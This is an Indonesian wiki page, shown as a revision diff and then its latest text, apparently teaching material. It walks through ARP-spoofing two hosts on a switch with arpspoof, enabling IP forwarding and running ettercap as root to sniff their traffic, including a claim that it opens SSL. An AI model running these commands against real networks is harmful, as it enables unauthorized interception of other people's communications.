MITM: aprspoof switch: Difference between revisions
From OnnoCenterWiki
Jump to navigationJump to search
Onnowpurbo (talk | contribs) No edit summary |
Onnowpurbo (talk | contribs) No edit summary |
||
| (6 intermediate revisions by the same user not shown) | |||
| Line 8: | Line 8: | ||
echo 1 > /proc/sys/net/ipv4/ip_forward | echo 1 > /proc/sys/net/ipv4/ip_forward | ||
sysctl net.ipv4.ip_forward=1 | |||
sysctl -w net.inet.ip.forwarding=1 | sysctl -w net.inet.ip.forwarding=1 | ||
==Asumsi Jaringa== | ==Asumsi Jaringa== | ||
192.168.0. | 192.168.0.106 --- SWITCH ---- 192.168.0.100 | ||
| | | | ||
| | | | ||
192.168.0.3 | 192.168.0.3 | ||
komunikasi antara 192.168.0. | komunikasi antara 192.168.0.100 dan 192.168.0.106 melalui swicth akibatnya 192.168.03 tidak bisa melihat packet yang lewat. | ||
Attacker 192.168.0.3 harus melakukan spoofing. | Attacker 192.168.0.3 harus melakukan spoofing. | ||
| Line 24: | Line 25: | ||
attacker melakukan spoofing | attacker melakukan spoofing | ||
arpspoof -t 192.168. | arpspoof -t 192.168.0.100 192.168.0.106 & >/dev/null | ||
arpspoof -t 192.168. | arpspoof -t 192.168.0.106 192.168.0.100 & >/dev/null | ||
| Line 33: | Line 34: | ||
killall arpspoof | killall arpspoof | ||
==Siapkan ettercap== | |||
Edit | |||
vi /etc/ettercap/etter.conf | |||
Ubah | |||
[privs] | |||
ec_uid = 65534 # nobody is the default | |||
ec_gid = 65534 # nobody is the default | |||
jadi | |||
[privs] | |||
# ec_uid = 65534 # nobody is the default | |||
# ec_gid = 65534 # nobody is the default | |||
ec_uid = 0 | |||
ec_gid = 0 | |||
Perhatikan juga | |||
# if you use iptables: | |||
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | |||
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | |||
| Line 39: | Line 68: | ||
sadap komunikasi antara 2 mesin, | sadap komunikasi antara 2 mesin, | ||
ettercap - | ettercap -G | ||
yang menarik dari ettercap dia juga akan membuka komunikasi SSL yang terenkripsi. | yang menarik dari ettercap dia juga akan membuka komunikasi SSL yang terenkripsi. | ||
| Line 51: | Line 75: | ||
ettercap -J | ettercap -J | ||
==Referensi== | ==Referensi== | ||
* https://www.irongeek.com/i.php?page=security/arpspoof | * https://www.irongeek.com/i.php?page=security/arpspoof | ||
* https://informationtreasure.wordpress.com/2014/07/31/man-in-the-middle-attack-with-kali-linux-ettercap-mitm/ | |||
Latest revision as of 09:27, 4 April 2017
sumber: https://www.irongeek.com/i.php?page=security/arpspoof
Untuk melakukan arpspoofing pada switch.
Set IP forwarding
Set IP fowarding
echo 1 > /proc/sys/net/ipv4/ip_forward sysctl net.ipv4.ip_forward=1 sysctl -w net.inet.ip.forwarding=1
Asumsi Jaringa
192.168.0.106 --- SWITCH ---- 192.168.0.100
|
|
192.168.0.3
komunikasi antara 192.168.0.100 dan 192.168.0.106 melalui swicth akibatnya 192.168.03 tidak bisa melihat packet yang lewat. Attacker 192.168.0.3 harus melakukan spoofing.
Aktifkan arpspoofing
attacker melakukan spoofing
arpspoof -t 192.168.0.100 192.168.0.106 & >/dev/null arpspoof -t 192.168.0.106 192.168.0.100 & >/dev/null
Bagian "& >/dev/nul" di ketik agar mudah menjalankan di satu terminal.
Untuk men-stop arpspoofing,
killall arpspoof
Siapkan ettercap
Edit
vi /etc/ettercap/etter.conf
Ubah
[privs] ec_uid = 65534 # nobody is the default ec_gid = 65534 # nobody is the default
jadi
[privs] # ec_uid = 65534 # nobody is the default # ec_gid = 65534 # nobody is the default ec_uid = 0 ec_gid = 0
Perhatikan juga
# if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Sadap dengan Ettercap
sadap komunikasi antara 2 mesin,
ettercap -G
yang menarik dari ettercap dia juga akan membuka komunikasi SSL yang terenkripsi.
Untuk menggunakan ettercap untuk sniffing, dapat menggunakan
ettercap -J
